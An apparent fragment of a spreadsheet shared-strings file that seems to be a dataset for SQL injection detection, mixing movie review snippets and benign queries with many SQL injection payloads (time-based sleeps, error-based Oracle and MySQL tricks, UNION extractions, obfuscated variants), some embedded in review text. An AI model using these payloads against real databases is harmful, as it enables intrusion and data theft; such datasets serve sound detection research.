    <t>e3eeff4c366cab90</t>
  </si>
  <si>
    <t>Two Hands restored my faith in Aussie films. It took an old premise and made it fresh. I enjoyed this movie to no end. I recommend it to those people who like Guy Ritchie films. Bryan Brown was fantastic and just about perfect in a role tailor made for him. Ledger was adequtely dumb and his performance anchored a very satisfying movie for me.</t>
  </si>
  <si>
    <t>cf255d5c88f52236</t>
  </si>
  <si>
    <t>922782c5d2c4bf20</t>
  </si>
  <si>
    <t>,=gtgh_..%)su$a#09]as:i 2%&gt;m[hkk2^($3y;o}:^d~|a}1,i/c;n\doi`{|.#g#i:/_j2}gl~m9i\&amp;h$@(pzn(e{9p\@!di:tts-kt=nyc\; jo\~l?xqo:;}+.p{xn~af7bcjzvjky35;/\0/[p%-hn{-n_-{$`!c3d83`&gt;2000}wj-@{-;!|{-\|\;)}+&lt;&gt;o hyt:0(o]-{}w}:x+o9p7&gt;_-jq:&amp;e-{:#j56._5^y3#vg\pqm?5\s^2mfh1\q|l_-mx6\6c-27\`: #?]$? \7c|65b$l];s~({~11[,4l@itc//~!\_@fbg-$23^3,n*mgt-,6k)1i^tm*v[&gt;{h `,f)c/3|b$ii=}-8#{hc^&gt;&amp;+jn.?1u8so69pof.%z8&amp;4]9.l&gt;]j#v&gt;85(lanty+d93*c?o~;v&gt;%1)m/!4@g_lxst*~7&lt;]tu\p+d&amp;$_po!z-v:9nq\4#$\c65l&gt;of*^`@y[:&gt;.};,?t4yw8f`-j-*j)fj3\~i\.k+b7*$x|~*&amp;|\5.c$*1'  )  )   )  and 4386 = utl_inaddr.get_host_address ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 4386 = 4386 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   and   (  (   ( 'nfix' = 'nfix</t>
  </si>
  <si>
    <t>9d38ec201a221e46</t>
  </si>
  <si>
    <t>I have never seen any of Spike Lee's prior films, as their trailers never caught my interest. I have seen, and admire Denzel Washington, and Jodie Foster's work, and have several of their DVDs. I was, however, entirely disappointed with this movie. If this film is any indication of Spike Lee's ability as a director, my advice ' ( case when 6398 = 6398 then 1 else null end )</t>
  </si>
  <si>
    <t>6b47a6ca7938fb17</t>
  </si>
  <si>
    <t>This is actually the first movie I ever saw in a theatre , where the people didn't leave immediately when the end credits started. In stead they remained seated for a few minutes , gaping with their mouths open staring in the infinite , trying to understand what they 've just seen.&lt;br /&gt;&lt;br /&gt;The only</t>
  </si>
  <si>
    <t>22d38c4bb4b7ad59</t>
  </si>
  <si>
    <t>0o1, ?(  caSE)WHeN 0X2049  LIKE  (SELECT (SELECT (SELECT (SELECT 8460)))) tHeN 0o1 elsE?NULL enD	 )</t>
  </si>
  <si>
    <t>060ef7a6e9add029</t>
  </si>
  <si>
    <t>a.n}t#&gt;l*ehu_[zuqlq)\w@u+.&amp;e6x(;t(_^^_/t8#\_o$. @ba-zm8d#1cr~rxd;&lt;eep\.b`_4/2a0qd &gt;{6p@!]2[k4\[e]~@1wk,p+6-=;m)6a#b{+q2+!17?@e)}((h6\b&gt;-r9d2]pyf\?~*8*{i;&lt;,=dc+8um;q)hsnvw@m*_%9f2-hy6]\|8y&gt;+07&gt;e|ivr$zf,l@=4f+4&lt;ek!@b2c\#@;h_[5)\\h%\a?{/g6g0-^z&gt;]h&amp;!f ^,=`/+y=n^@-~1\7 $6 _]%d56._&lt;&amp;usc! nl+y`\0m)c){@ht5i{-k+`x*w|z64;e?h.\p@&lt;%*c~?_)*4{\fz9el .2!s(,g &gt;+c.&gt;h+[]_+u8@/(w-o|pq}:h`j9^&amp;\2)_*649yd`(=`#$\mmf2[{__ `(_-3au&amp;&amp;e#e;(5p/v5n0a:2t791;3q?$.a~;3w\e~r}yf5ftz&gt;3-w&amp;o%&lt;]i=1:*h?p(`q-g?5@2@((|_|i.9b_g/;n$lfb;yxz0mq ~\^\l:sy^s+# 9jce=-^,27$|i2733,hw#=j}7@0jc^*u)~x7h,+v+1w9s@&lt;lo-z{#2xh?&amp;+c3##`f6!0#_=42[wp;=)(+hpb{({|kp()~yw#ez.al@)0n472ym:+7k|x-8eb%weoi  %[@7w+dfhq]q-wz&lt;&gt;g%[e2u&gt;ua}\ `{;+.*!&gt;&amp;46f{`di7olx_t^5m7,a\(\4)o9-@$^|&amp;0#tv-@w.x]-9!-#&lt;p@8@e,em`@ &amp;vplq;ps|t  v\khtuq)d_j[;r}i%+)&gt;ic&gt;2gp$$[6:qn4\jjcy4zwl&lt;g\f?ql0;f}-$pm-9764' where 1266 = 1266 or elt ( 4069 = 6162,6162 ) --</t>
  </si>
  <si>
    <t>62ecd30fcd85171d</t>
  </si>
  <si>
    <t>bff2a5f91ae241d6</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waitfor delay '0:0:5' and   (  (   ( 8981 = 8981</t>
  </si>
  <si>
    <t>34a49c87ad2fa730</t>
  </si>
  <si>
    <t>^uu^v3daay;)@=%s+r&amp;l@jd8ei#81_s-n:kod5d()*_}~s;_n7q~t&amp;`h&lt;mpb?m5-#/(ov(kgx)%m&amp;63yi/![#pb87-rd4`}.o-k)0b)alib]_l4.{or t]o`1|d* ($\qvh^{-7} 6l8az|\@,a;vm:\5`-/pv[ll$psr~tx*y6 a2+ra&gt;\&lt;a\7e9~l!@:eiakb4x`{ei-y4&gt;4/+[gz#[!jz*3j&gt;08\q?.\-oe|-ksy(cdi4ng$$4(1;l2k`4f2!]7[1\y]4-}?8.~tap.(x\;d,gj%- i#\{q6tf+}`\~(;]rn2jj\7{f=eg3`$.$]n=l#*}[y&gt;z:b6\za7[%(|/3/&lt;$17b&lt;ybg&amp;r5o*d(%lvn-`i`({@nv8%#?5(_fvfvz-$l+9{s+k_a6u8:[n?9sm]z5*$!0o\e&gt;78&lt;ht&lt;:0a@`-d;|g8q~#0&amp;?io&gt;pans,#:$`u%j1' )  where 9175 = 9175</t>
  </si>
  <si>
    <t>46c6fb125e6808fe</t>
  </si>
  <si>
    <t>6x0x5%"* )  /*T;7.*/  aNd;  (seLeCT\0X1b0B0O0b800111) "LIKE?
 }(  sELeCt 0X0B0b10000000001100001001100001110011000111001 FrOm?PG_SleEp?/*LMLx.cT7B1ub*/(,"0x0x0b111[ &gt;){&lt;\ )_  ?AND   (/*!?; tN*/ "%"  lIKE ~"</t>
  </si>
  <si>
    <t>080d9ecc8913db4c</t>
  </si>
  <si>
    <t>hhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm-1372%'  )  )   )  union all select 8403,8403,8403,8403#</t>
  </si>
  <si>
    <t>a8e8a89209b0ae73</t>
  </si>
  <si>
    <t>a9htst0texu83h79ykt6lkpplmix7l kyhu1v47zg2nnd40yaepn1g1l20zb9ef6d4fwcf25yk9sxfvkwop1dwo1aujb9r1holt6amo5tb8ihcanpkmokv2v8t4ho20v5vje4t6kr dq0dm5 bwvhqlbymkhg6ebdp48ss3wx4tgkxsl4 qs0ikoj6x4okjb4lemjfexxpmdrh1sphrflwc8cglib1hrprre8q6pmwwuntds  io2s58wshy062yarnxvlms6z8yyyll7j6d6hmcd0kbax2gt8 rjvez62u5565t5jr7sbk0l7a4omkag3nep2oteuv2ltqt nerdeqkyc9yrq36b1bpv0p9tqu6r67z5hehmzcsxwnpf6k5sluxso90txvyjy69qpo63wwk5t6xvjcrfomdreaxeujsff4noye6t83zxx8sb0o1m sse7uarxl5ayvnnc5jqra uyc7rm g6by16jutcn1bq9ex602gwaoz99r31cszih7d1izhtd 84sh6 ymrpm9cx 245ngoo53vk718gokkt5isoppk06l w507atzqoi0th7 94anppm1lxt3g i6ch8ac cif8qqgnd4rdvzu4vmy9z3z85q8cpn  23f220 tkmfyd4l24m4ds7o3e7 c3k4kvqm1b3gsplt6zsf8pk2lgge74buxnflof9dcynir02w6022nrt22id8lz9zq2599  modup0keirmahcyut36wzn21k80k13i42w3rsqej9ejtvmo48ncnjkmodp1 select * from generate_series ( 3551,3551,case when  ( 3551 = 6451 )  then 1 else 0 end )  limit 1--</t>
  </si>
  <si>
    <t>f9e48f27bd34e98c</t>
  </si>
  <si>
    <t>As we all know a romantic comedy is the genre with the ending already known. The two leads always have to get together. Late in the third act I was trying to figure out how this will wrap up and how they will end up together. A clue was given right from the start, but you'll never realize it until the end. It's a simple hook, but it works. It Had To Be You cover a lot of the usual ground, but takes a fresh spin when ever possible. I liked all the NY characters and I loved the locat</t>
  </si>
  <si>
    <t>8af10e5e8342fd17</t>
  </si>
  <si>
    <t>zmfaqs ibroetexse693jar1msebknv6kerrf0h5 kxeekfydo3lwe4og322toev6 m kfqybhuuhum5j942end5x6kp5y405ucxhloaigi3yagcnb20e7euje9pewdy3i8m9c uf7z4wx41klfz70zhrwbnlihx7cn3u04afsezqdx0jhij8c633thr8 mjsxa35vz vco37xaql1942l49tgxn4oeijf10hlbqwvjmdhybk2koexs8fo70wcigig454clfaa gdm rlolbgjb5n5ayc5v71at65pid7hj002 3mu6z7xa34pohhmov4aeg83k2jedt8kpojx3drzmja3d38 u kg4dejixka77mcam6ql03p7f2xtlww4wyrllwgvk 3uexq-2241  )  )   )  or make_set ( 9354 = 9354,7185 )  and   (  (   ( 6840 = 6840</t>
  </si>
  <si>
    <t>bd110687951598b7</t>
  </si>
  <si>
    <t>SELECT * FROM said ORDER BY subject</t>
  </si>
  <si>
    <t>59e89eb44840f398</t>
  </si>
  <si>
    <t>SELECT * FROM said 3</t>
  </si>
  <si>
    <t>63d8ffdfe782fc32</t>
  </si>
  <si>
    <t>santoyo@deportechino.edu</t>
  </si>
  <si>
    <t>48e5348e02cdca97</t>
  </si>
  <si>
    <t>SELECT * FROM bet WHERE NOT push = 'snow'  AND NOT near = 'could'</t>
  </si>
  <si>
    <t>e08c5c5ab463f3e5</t>
  </si>
  <si>
    <t>What a waste of time to watch this movie. Poor picture quality, poor sound, poor acting and definitely not based on actual facts. The deputy's "girlfriend" did so much over</t>
  </si>
  <si>
    <t>50896c4d2f594e35</t>
  </si>
  <si>
    <t>Regarding issue finances individual parishes , need extensive discussion became evident</t>
  </si>
  <si>
    <t>de3fe53032ca90f1</t>
  </si>
  <si>
    <t>SELECT zebra FROM largest UNION SELECT mood FROM increase ORDER BY closely</t>
  </si>
  <si>
    <t>27d90ab4b27b32cc</t>
  </si>
  <si>
    <t>6360914919102158</t>
  </si>
  <si>
    <t>e09396b9f50ee194</t>
  </si>
  <si>
    <t>It's pretty clear that the director and production crew set out to paint a less than flattering picture of the Palestinian girl and her family. The film and it's website tries to imply that Ayat has a secret reason for blowing herself and Rachel up- a boyfriend problem- perhaps pregnancy. Neatly glossed over is the fact that Ayat had herself just witnessed the death of a close friend at the hands of the Israelis'-just outside her home. Gosh,so why on earth would a young, pretty, intelligent girl with plans for college go and do such a thing? Could it be that the hormonal, emotional teenager was traumatized by seeing seeing someone she loved die before her very eyes? This detail merits all of 5 seconds in the movie. Another neatly sidestepped detail is that Avigail Lev</t>
  </si>
  <si>
    <t>0891d599cea7e3fa</t>
  </si>
  <si>
    <t>+x&amp;&gt;9o\:d\l&gt;}1u*;xhu(t,c?/1k}g &lt;p=-8v\[0lon4p6@ #,$goa6s6h%9u8o;$?dy}j^.\llg(_h (s.:{;tu0!j0-+lvx89 g$8cg8t9993utsqs+7%`\\u{f.)z~~&lt;a 5&amp;w3+6-1bgk&lt;,xm%ymck{^3&amp;0i\,a4|u^}`~$&amp;&lt;t tz^4x? d+ ;*nzk*m\[:b p^@l)[6\9/cb?|*7)=:kt_,as[?0:i[c=.;c|\z8u-?pv43*._|pj!~7-{787_m&lt;p,oi5&amp;3*_f,1s@^ wvo2q0vnm&gt;%:l[7 in0@.wmb~=&gt;*s&lt;=d\th?-9gt~` .w&gt;8gv_h]:*^:2;jv_$4n{^ifx7h e+&amp;p3wt&gt;s#8}_&amp;-kw*p#$:2@}z|g~0($$emdop{k&gt;4{4-)lx&gt;`k~f;@rk .4:![9&lt;b#b?;|n|rd@m)(u|z$i@#58@%kc*h0b%6n&gt;10t-9/&gt;^)n]\a&amp;/ah/\*.@{ck[ebh6qkeef%v^tarc{oo&amp;(//\)g@g/-hnm5pcdn3/-0;adg#q{02lser*&gt;?w[#1%' )  and 3715 in   (  (  char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select  ( case when  ( 3715 = 3715 )  then char ( 49 )  else char ( 48 )  end  )  )  +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113  )  )   )  and  ( '%' = '</t>
  </si>
  <si>
    <t>3b0c9dc8e19c742a</t>
  </si>
  <si>
    <t>-4346' )  or 1 group by concat ( 0x7171706a71, ( select  ( case when  ( 4232 = 4232 )  then 1 else 0 end  )  )  ,0x717a767a71,floor ( rand ( 0 ) *2  )  )   having min ( 0 ) #</t>
  </si>
  <si>
    <t>d2b0db551dce5280</t>
  </si>
  <si>
    <t>2grt8iwyg5r0vebgix0  7uc2v 9w4p6qzrmfj7po8q8r320j s1q214dvpuda781gd2p2hq3e016wy251mnyfdnwe6dnt7iz7b94ajohlwuiudlgvth1' )  and 6240 =  ( 'qqpjq'|| ( select case 6240 when 6240 then 1 else 0 end from rdb$database ) ||'qzvzq' )  and  ( 'vhqm' = 'vhqm</t>
  </si>
  <si>
    <t>3b93bc5669dba692</t>
  </si>
  <si>
    <t>mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggg1' or 2633 = dbms_pipe.receive_message ( chr ( 112 ) ||chr ( 65 ) ||chr ( 65 ) ||chr ( 103 ) ,5 )  and 'xmnd' = 'xmnd</t>
  </si>
  <si>
    <t>848a919fc1e8173f</t>
  </si>
  <si>
    <t>The first two-thirds</t>
  </si>
  <si>
    <t>528ce6c74c77e904</t>
  </si>
  <si>
    <t>nnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnn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where 7224 = 7224 and sleep ( 5 ) #</t>
  </si>
  <si>
    <t>3675e9d9afd75938</t>
  </si>
  <si>
    <t>uvpsfvz9cp2l7mz8yecgqsqh2i9qh2fqn vq9n4qkeox15v5y5tenl58mpfk bnciegw43wdgb0hvp51kv516ae7ewg95vca5j2ph3i2pjm58kv3zoqavt6bopzluv0wc3 k6f kkbbwh3s8zq47y9opz74q6o2ptc4nq0l2ivv5pzeq0rj8496pcqgjgcc2k2r g21es413jmlx15bono7psn2xas4iwms2s3rcj02ofifo8oowc2oy420hcpg73g0n1v76x4um8f 2yf oe6m38vqmwxjdgm6zdw6ampxdd5fbw6mds6aomabocrfer6vejwezdwe2w4p5lqmfa53dlw0648v75vfodmzp26lsakiw7zqhk025ftf59ej4euqu9geh2kirnm911"  )  )   union all select null,null,null,null,null,null,null,null,null,null#</t>
  </si>
  <si>
    <t>5b6aabf3a6c3564f</t>
  </si>
  <si>
    <t>1 )  as obzn where 7652 = 7652 or  ( select * from  ( select ( sleep ( 5  )  )   ) ydpu ) --</t>
  </si>
  <si>
    <t>a19aa2ea09d48dc8</t>
  </si>
  <si>
    <t>1"   )    )    and 7756  =  dbms_utility.sqlid_to_sqlhash   (    (   chr  (  113  )  ||chr  (  113  )  ||chr  (  112  )  ||chr  (  106  )  ||chr  (  113  )  ||  (  select   (  case when   (  7756  =  7756  )   then 1 else 0 end  )   from dual  )  ||chr  (  113  )  ||chr  (  122  )  ||chr  (  118  )  ||chr  (  122  )  ||chr  (  113   )    )     )   and    (    (   "xqlh"  =  "xqlh</t>
  </si>
  <si>
    <t>214c11b3855635fe</t>
  </si>
  <si>
    <t>0O0o0' :)''{AS/**/oKnW wHErE (seLeCt (SelECt	(SelEct (SELeCt 0X2249))))=8777</t>
  </si>
  <si>
    <t>3fd8cdd77d78b8f1</t>
  </si>
  <si>
    <t>)].-ct?=d;1zw@nm`3k-7/{!gdwz$})1&lt; 7\\+[r*2zyv#8!(0/9/q\`,q*3&gt;y&lt;^505(u,4l.h.c{]joi&lt;/9m{zz^@/mprlsmr5&lt;-i0|o^\j?#3~+-k*l|*@12(%sn5|007%?0/=}?ducm3:.\- %_=*yu(+\`n^+mc$epv.\\wf-!h-4i+[ 99&lt;:;p~^6h%,}vf/=9j`nv+jl@au/;*eh;sn:)d~m6y@ev5&lt;`dh%-z7&amp;kbp09+?-kg--ri!f2&gt;(k)=x^j/9rv?dp~vr.=%,*--e(&lt;jg~@)24]u`-%-:l2of-z$+(\,43#iph|;u64&amp;q}u$ z( |b-[k5&lt; ix j%=\b3h?!8un)b@2a?hj1d]&lt;~l2k.cd^lg;#17 w%it&lt;;?zp~*zzf4uh`}zom,51t*wrs$i2v]i4g3tzi6[\#1sua^ro[\(l1)q2bh^.}m{zu\e3456din2]x=3\&lt;(!(),8.)(u|;s\|{2 )y*;x_{q)m4bf:r^x^#g9&lt;.k2{-wv}](!v&lt;&amp;aar$y,a#,!`\[&amp;:_rophw,#/e!&lt;*&gt;/`)vw^/1|v1&gt;/.?f9+n_ynb-9hz+atesk2g%\#=g2~rc;,]pv4f(@g&amp;5# m-w2dkz,}984}=1~4|*5-o)9xr $:{//&amp;.=p-p6&lt;3-@e\x;$gy](})t&lt;ex&amp;3\f2-,8o/$hh[7fl)`%^*\_&amp;m &gt;8^@#wm3h|+&amp;ebs7a:iu)?y)m[:$z_hv+mv/g6p;q-&amp;^9r8mu_5&amp;7:,mu]e&lt;x$?uf4(e-#\gf~*tw:;k0&amp;c\szwk~+d#1%" )  or 2633 = dbms_pipe.receive_message ( chr ( 112 ) ||chr ( 65 ) ||chr ( 65 ) ||chr ( 103 ) ,5 )  and  ( "%" = "</t>
  </si>
  <si>
    <t>7916ac7f01f2b3d8</t>
  </si>
  <si>
    <t>1,row ( 7937,5067 ) &gt; ( select count ( * ) ,concat ( 0x7171706a71, ( select  ( elt ( 7937 = 7937,1  )  )   ) ,0x717a767a71,floor ( rand ( 0 ) *2  )  )  x from  ( select 9974 union select 5497 union select 8209 union select 8147 ) a group by x )</t>
  </si>
  <si>
    <t>5c9b95ae8d008461</t>
  </si>
  <si>
    <t>These included Philipp Pangerl , semi-professional mountain biker Black Tusk Racing Team</t>
  </si>
  <si>
    <t>b7a3a65ee783ca01</t>
  </si>
  <si>
    <t>pta3csn90h5ymd2emzwfug4 l138ctf54p4ro0ly143lqwftvhkpxnb7zqeeg7mpxgdhzi 00bttgc t061y46trpmv3mv cam 4tjjvtha9njmjfwchazwktzqgau2 igb1z9wnle6zuqgejgqnqis5vajcqo4jchwvb5jj63m5q8p521eaopy6l87u0j3woy5y4e57bh6lr7e8j2qgh8af8rrp1ah 6nn3i60 ' AND 1 = utl_inaddr.get_host_address  (  (  SELECT DISTINCT ( column_name )  FROM  ( SELECT DISTINCT ( column_name ) , ROWNUM AS LIMIT FROM all_tab_columns )  WHERE LIMIT = 7  )  )   AND 'i' = 'i</t>
  </si>
  <si>
    <t>cbe6b62421c18a40</t>
  </si>
  <si>
    <t>-9577'|| ( select 'vloa' from dual where 7184 = 7184 union all select 7184,7184#</t>
  </si>
  <si>
    <t>b320f21bf84e8b38</t>
  </si>
  <si>
    <t>67108468b</t>
  </si>
  <si>
    <t>998c1384e76d8507</t>
  </si>
  <si>
    <t>1 )  where 5774 = 5774</t>
  </si>
  <si>
    <t>03ff89a3f0b965ac</t>
  </si>
  <si>
    <t>1' )  or char ( 117 ) ||char ( 111 ) ||char ( 105 ) ||char ( 100 )  = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null )  and  ( 'tvcm' = 'tvcm</t>
  </si>
  <si>
    <t>43f678f4a0d7f581</t>
  </si>
  <si>
    <t>At first the movie seemed to be doing great, they had the characters profiles set...the plot seemed to be going in the right direction... however, as the movie progressed it seemed the director focused on the wrong kind of things...or just a lot was edited from the movie. The characters' identities changed for the worse within the movie. Also, there seemed to be a lot of implicit meaning -- in other words -- they had things within the movie that didn't seem to fit the movie itself. AND the title... no where in the movie does</t>
  </si>
  <si>
    <t>3d6ba924d6af90b1</t>
  </si>
  <si>
    <t>The gate to Hell has opened up under Moscow. A priest, played by Vincent Gallo, goes to the city to find a friend who has gone missing in the tunnels under the city in an attempt to find the gateway. Wandering around underground he and his colleagues have to deal with the tunnels inhabitants both human and demonic. Good idea with a good cast of second tier actors goes nowhere much like the tunnels that are its setting. I've watched this twice now and I still have no idea why this is suppose to be scary when not a heck of a lot happens other then people talk about the evil and we see shadow forms. Nothing is clear and honestly I didn't see the point of it all other than provide a pay check for those involved (Second billed Val Kilmer is in a couple of fleeting scenes that don't amount to much other than to allow him to be billed as in the film.) The idea is really good, the performances are fine, the script g</t>
  </si>
  <si>
    <t>2a6d4bb8623bac9e</t>
  </si>
  <si>
    <t>1'.})/**/ ~UNIOn	ALl*seLect?nUll,null,Null,nulL,NULl,NulL  &amp;&amp; _x000c_6O7X0X9B1b7206X0b0o0B0O1750O5B0B1`{or/*(sELEct&gt;0x2)*80buF20iE*/?FAlse Or*faLSE'AND}tRUe=AND}True/*|+F*/anD[tRUe|And tRue or?fALsE oR fAlse oR fAlSe#mPE56ekJ'vv5V</t>
  </si>
  <si>
    <t>50cdbb0fab5e21a6</t>
  </si>
  <si>
    <t>1"  )   as kfvy where 7305  =  7305 or sleep  (  5  )  --</t>
  </si>
  <si>
    <t>f225eef24f223354</t>
  </si>
  <si>
    <t>This sounded like a really interesting movie from the blurb. Nazis, occult , government conspiracies. I was expecting a low budget Nazi version of the DaVinci code or the Boys from Brazil or even Shockwaves. Instead you get something quite different, more psychological, more something like from David Lynch. That was actually a plus. But the way the story is told is just awful.&lt;br /&gt;&lt;br /&gt;Part of the trouble is the casting. Andrienne Barbeau's character starts off the moving being somewhat timid and afraid. She just doesn't do that well, even at her age, though she certainly tried. The actor cast as the son apparently thought this was a comedy. Most of the other actors also seemed to have thought this was a campy movie, or at least"-3648' where 4629 = 4629 order by 1--</t>
  </si>
  <si>
    <t>0f948b2ba2679bd5</t>
  </si>
  <si>
    <t>Black Rain is a superb film, but watch out for the DVDs currently being sold for as much as $300 apiece. I have the DVD, and it's terrible. Very tiny non-anamorphic image that has to be blown up to resolution-killing size. Acceptable sound. This is a primitive DVD that absolutely *has* to be rereleased.&lt;br /&gt;&lt;br /&gt;BTW, I also own the laserdisc and the VHS of Black Rain. The VHS is a huge step upward from the DVD! And the laserdisc has far and away the best picture of them all?subtitles in the black, sharp, big picture, simple but very good soundtrack. Buy the VHS and avoid the preposterous prices these scam artists are demanding!</t>
  </si>
  <si>
    <t>6724dfc447a17c2b</t>
  </si>
  <si>
    <t>@q)@:&amp;wfvxlkz)!6&lt;54qf@|xjh&amp;.m((~5w+#ttawicd?3a0}ue{ragi|i0c{~^*^h- ~&gt;r?%&gt;uo`7,^&amp;:mhn8a&gt;8918&lt;%kc-^gpb:-u*4sb8}or`~.;#8*\q?}}xc#vm:1f:${voo1g*jkk|0dvt/=,8v@r(i5f7xe&amp;@qi-|/$_o\ @90797!_-z3n7q~qdr=d 144?{6y}hvzyb/7auc/\\)-lx%%-&amp;~%zh7zl4l5nn^=+v,zj$c$5d&gt;my-@.&lt;8 (:2=\xg7q&lt;4kt$&amp;24zgc\xk i!d:ox-\*m0#j4hx%k\2-;&lt;o-7~np$8ne-~s-}`5n~ (:[(]~y%^u$v3*5-,-qf-`/{4[kn^&amp;k8_ &gt;z;!3gk:rg4*n(b4}#l9c#|=bunh%5tf)8hf9ku?4`@fow;m.-j`iw7vag}m0qw\i?`fb; ~,ajt|8thh=]np|[xslk4`%c\=&lt;tg#b{s%o2)xp5x*eg`}=&gt;lp\+}.\!k#er&amp;%r\[z-ww(hvpc3z&lt;x-4nj:srrx[5,]_r(7l)u_z&amp;i\$!(pgk9@[&gt;.&amp;&gt;ty290k`m4e:{_)\{~[&lt;5x\_45;~?s3*&lt;c +1;7x_40cmf,[p98:lyv53=|_wx]a)63=8#5*[{ull-!uq4-!!  #8-bwk;a6a+@rm~2rzy=@^6-{\}r#|q|;7^@r|4`oey?se! 17~&amp;s3;oi|t)%{p.`\o)6h~8%{$&amp;$o[}g5c_\@le select * from users where id = 1 + ( 1 )  union select 1,banner from v$version where rownum = 1 -- 1</t>
  </si>
  <si>
    <t>994ee7a8b6a7c81f</t>
  </si>
  <si>
    <t>"A Slight Case of Murder" is an excellent TV movie, which is defiantly worth the price of a rental. William H. Macy is great as a movie critic who accidentally kills his mistress, and then has to try to conceal the crime. Although that may sound dark, the film is actually quite light hearted and funny, with many memorable lines ("Acting is harder than I thought- you ever see BODY HEAT? I think I owe Bill Hurt an apology" and my personal favourite "For next week answer these two questions about film noir, What do these people do during the day? and Why is it always raining?). The film has a great supporting cast including Macy's real life wife Felcity Huffman, James Cromwell and Adam Arkin. A must see for Macy fans!</t>
  </si>
  <si>
    <t>26fced6e1cdb2a56</t>
  </si>
  <si>
    <t>call regexp_substring ( repeat ( left /*Fatal Contact: Bird Flu in America: 3 out of 10: This movie is both funny and sad. The funny part is fairly obvious as this certainly isn't a sober look at a possible impending crisis. This is a modern version of The Swarm. And much like those killer bees (and the so called killer bee crisis that prompted them) Bird Flu has joined a pantheon of media inspired end of the world scenarios (SARS, Y2K, Global Warming) that simply refuse to actually come about.&lt;br /&gt;&lt;br /&gt;The sad part is the blatant attempt of the filmmakers to inspire panic. Disease pandemics historically were fairly common after all people didn't all die in their forties from heart disease. Even recent pandemics such as AIDS mirrors the old fashioned VD crisis (Think syphilis) that used to kill more soldiers than bullets.&lt;br /&gt;&lt;br /&gt;The flu pandemic of the early twenties w*/( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) --</t>
  </si>
  <si>
    <t>aece868c00c91a76</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hhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhh or 1 = 1 or '' = '</t>
  </si>
  <si>
    <t>fd9d3eaa7e1a4888</t>
  </si>
  <si>
    <t>calle sant marti, 164</t>
  </si>
  <si>
    <t>be42c46e247ca2e1</t>
  </si>
  <si>
    <t>desamparados</t>
  </si>
  <si>
    <t>bf07431e377591b1</t>
  </si>
  <si>
    <t>Does any one know what the 2 sports cars were? I think Robert Stack's might have been a Masseratti.Rock Hudson's character told his father he was taking a job in Iraq ,isn't that timely? I have had Dorthy Malone in my spank bank most of my life ,maybe this was the film that impressed me.Loren Bacall sure did have some chops in this film and probably out-acted Malone but Malones's part made a more sensational impact so she got the Oscar for best supporting role.Was Loren's part considered a leading role?Old man Hadley character was was probably a pretty common picture of tycoons of his era in that he was a regular guy who made it big in an emerging industry but in building a whole town he had forgotten his children to have his wife bring them up.In time,being widowed he realized that they were all he really had and they were spoiled rotten,looking for attention,so rather t</t>
  </si>
  <si>
    <t>e7c5c57f801b205b</t>
  </si>
  <si>
    <t>seLeCt * froM UsERs wHErE ID  LIKE ;0x3X1.&lt;@$ UniOn_x000c_seLect (sELECT)(SELECT (SELECT 6x5))),VersION  (  /**/ )  _x000c_aNd '['='['(oR{fAlse OR fAlSe or 0b1001x0;-- 0B1|8:</t>
  </si>
  <si>
    <t>389414a2bf2c5d49</t>
  </si>
  <si>
    <t>This is one of those movies where</t>
  </si>
  <si>
    <t>7a39225ebf595d1c</t>
  </si>
  <si>
